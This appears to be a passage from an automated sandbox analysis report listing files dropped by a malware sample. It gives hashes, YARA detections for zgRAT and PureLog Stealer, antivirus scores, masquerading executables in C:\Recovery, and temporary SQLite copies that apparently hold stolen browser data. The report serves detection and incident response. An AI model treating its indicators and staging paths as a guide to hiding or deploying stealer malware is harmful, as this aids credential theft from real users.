                                                                                                            SHA-512:EDB4CB7D5F312AF7288318788F9B2900072B4577B86EF0928F6B7D0132A25E462251CC1AF9074BE4CFC75F8B7E20D38DFA4FA0038AC2EE6D78C9EF80B8C2E89A
                                                                                                            Malicious:false
                                                                                                            Preview:tbsrEYZdwISSv24BE3yn5t0vDYcNODVHC9ERpb0vXzbTJ1pKFS3mGlL9k6nq6MPtxLPvynWmCDPGSgmMtRH5JsBbyEqsxKzLkrg8l3Wc6RkDVFrDUb6pE

                                                                                                            C:\Recovery\9e8d7a4ca61bd9

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:ASCII text, with very long lines (788), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):788
                                                                                                            Entropy (8bit):5.876432277032464
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:zWlVv2DdoB7VX3Rug7ivaa5EdYsm+M3qDav:Kl1MW92pp5Eqs5M3Bv
                                                                                                            MD5:0C9054E09267D47D3716526BAD171BCD
                                                                                                            SHA1:054241A41FA35882D841D207DD0AD50D17EB236C
                                                                                                            SHA-256:918EE6A7A76E6410ED36AFA0868F1F1EF9A637B06B3F5E5E1497CC098ACA68EF
                                                                                                            SHA-512:723D7168D1F45318DB83076F7B2593688A8D8F178450FA38392D607AD353E0A5C1EFC47EEA81F5EB0A5139B66E60F37C45E3C0B7303B5AC0B47BF11D44D2511E
                                                                                                            Malicious:false
                                                                                                            Preview:TDFlDFapi1r8e9COhkmqXoi0IkfO18ZnttuBrGT2g4HuKtEhN3i9ybZoeOccjLxjbEOvPBhaRuKcgypZg8A7ZayRTFgcn1SUGhSGeSSMWHrER7IqjD5lK0KBP6bJeExab0V8fj4NpykSstAW703k5qJQXR0h0IsSURmblJL9Ir6WP1Sf6FMnKMeuqFlNsWWgGS8aGivxp3bOuxBf9Vlv5EHHx2ufi7RvUZP631YYTZ8QuQA3EFOXvlkCL0nOxPPrmq3UhEmH6MbgF0Wg21bct49tyNvCOKkEJQoEXpWAdGaiJD6UeHW6yx8rqJfTSj3vmXXyMSJNfb9mdajvRbiGyoPWS6XNJCr3Np6wqHIM7IbXxVNQkuB1Bw78HAfP46EctGZyexEJTVJpM2i7sHnYA01ar7opl3RBE9or6Zvwq2ipmSvPcigxTqb2O8HgJYhZDIkNO1BTV0rISMxYMYNCWerYhvc7SPmRUIlesiBkhMbc8SkCKsUuLeCjaLpcYDBGOaxKkTqoXnfKCPaPKawk42GzFCEg2iLeLVOheab1BqWi92gLvaR8QaLVU8FiPKvzbB8rB2uu95iOfi0Mg3vbQNNuK2NgV3m04hG83zJ2qh8V260wH2CWZUiOxOgJpNZGTrU7b1Srt2vtO22OBbYc1Pbj82KpSANcH2BKm2UPjUmgjz95VSHNy7ODPu8jrnYtpSmW0slIHJ2gm5AJ2PTA29nKn7424ui6631QNnEnq9GpEsbUtyqbTY0ppbs3ytOWk6ktEu6PLqT337F5gjIF

                                                                                                            C:\Recovery\RuntimeBroker.exe

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1991680
                                                                                                            Entropy (8bit):7.552871211185118
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:qhNLIZG9ZdCvfOqBlRF7kVkHreh1kEGD/5MTgsxjY9gIBiatkZ2hIHirkUP7oM8j:qGfj7rk+CLN9EIshijMX6i5w
                                                                                                            MD5:B379F4AC167609D8A3EF26444098B61D
                                                                                                            SHA1:85FE0BBBE666D72A955EE98444415194E00739EB
                                                                                                            SHA-256:430CBA76BB21F0FF671A5345C15A51BD047B0F5AECF764EF4668AE9085D22B80
                                                                                                            SHA-512:0028141132F1437FF556A00E7CD32298BF561690FD809F361FCFAF9B8837E5A173F4ACB192B25668550E2EC526EA4A518EA46E3FD7C2E1B8FAD1A49D8D6ED0FE
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\RuntimeBroker.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\RuntimeBroker.exe, Author: Joe Security
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 66%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....&g.................\..........nz... ........@.. ....................................@................................. z..K....... ............................................................................ ............... ..H............text...tZ... ...\.................. ..`.rsrc... ............^..............@....reloc...............b..............@..B................Pz......H........... ....................y.......................................0..........(.... ........8........E........M...)...q...8....(.... ....~....{v...:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8z...*...0..)....... ........8........E................1...V.......8z.......~....(T...~....(X... ....<.... ....8.......... ....~....{....:....& ....8....~....:u... ....~....{|...9o...& ....8d...~....(L... .... .... ....s....~....(P....... ....~

                                                                                                            C:\Recovery\RuntimeBroker.exe:Zone.Identifier

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):26
                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                            Malicious:true
                                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                                            C:\Recovery\xKVBpkhCEjg.exe

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1991680
                                                                                                            Entropy (8bit):7.552871211185118
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:qhNLIZG9ZdCvfOqBlRF7kVkHreh1kEGD/5MTgsxjY9gIBiatkZ2hIHirkUP7oM8j:qGfj7rk+CLN9EIshijMX6i5w
                                                                                                            MD5:B379F4AC167609D8A3EF26444098B61D
                                                                                                            SHA1:85FE0BBBE666D72A955EE98444415194E00739EB
                                                                                                            SHA-256:430CBA76BB21F0FF671A5345C15A51BD047B0F5AECF764EF4668AE9085D22B80
                                                                                                            SHA-512:0028141132F1437FF556A00E7CD32298BF561690FD809F361FCFAF9B8837E5A173F4ACB192B25668550E2EC526EA4A518EA46E3FD7C2E1B8FAD1A49D8D6ED0FE
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\xKVBpkhCEjg.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\xKVBpkhCEjg.exe, Author: Joe Security
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 66%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....&g.................\..........nz... ........@.. ....................................@................................. z..K....... ............................................................................ ............... ..H............text...tZ... ...\.................. ..`.rsrc... ............^..............@....reloc...............b..............@..B................Pz......H........... ....................y.......................................0..........(.... ........8........E........M...)...q...8....(.... ....~....{v...:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8z...*...0..)....... ........8........E................1...V.......8z.......~....(T...~....(X... ....<.... ....8.......... ....~....{....:....& ....8....~....:u... ....~....{|...9o...& ....8d...~....(L... .... .... ....s....~....(P....... ....~

                                                                                                            C:\Recovery\xKVBpkhCEjg.exe:Zone.Identifier

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):26
                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                            Malicious:true
                                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:CSV text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):847
                                                                                                            Entropy (8bit):5.354334472896228
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                            MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                            SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                            SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                            SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                            Malicious:false
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\backgroundTaskHost.exe.log

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe
                                                                                                            File Type:CSV text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):847
                                                                                                            Entropy (8bit):5.354334472896228
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                            MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                            SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                            SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                            SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                            Malicious:false
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

                                                                                                            Download File
                                                                                                            Process:C:\Windows\ModemLogs\conhost.exe
                                                                                                            File Type:CSV text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):847
                                                                                                            Entropy (8bit):5.354334472896228
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                            MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                            SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                            SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                            SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                            Malicious:false
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\s5duotgoYD.exe.log

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1396
                                                                                                            Entropy (8bit):5.350961817021757
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                                                            MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                                                            SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                                                            SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                                                            SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                                                            Malicious:true
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xKVBpkhCEjg.exe.log

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\xKVBpkhCEjg.exe
                                                                                                            File Type:CSV text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):847
                                                                                                            Entropy (8bit):5.354334472896228
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                            MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                            SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                            SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                            SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                            Malicious:false
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:modified
                                                                                                            Size (bytes):64
                                                                                                            Entropy (8bit):1.1940658735648508
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:NlllulJnp/p:NllU
                                                                                                            MD5:BC6DB77EB243BF62DC31267706650173
                                                                                                            SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                                            SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                                            SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                                            Malicious:false
                                                                                                            Preview:@...e.................................X..............@..........

                                                                                                            C:\Users\user\AppData\Local\Temp\0BresBxHuN

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\0azZWHnQxh

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\0hqvoBNCui

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\0lUHOfox91

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\0rj7WOA6a4

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\1EgE1dzTun

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\1H56ezOVVb

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

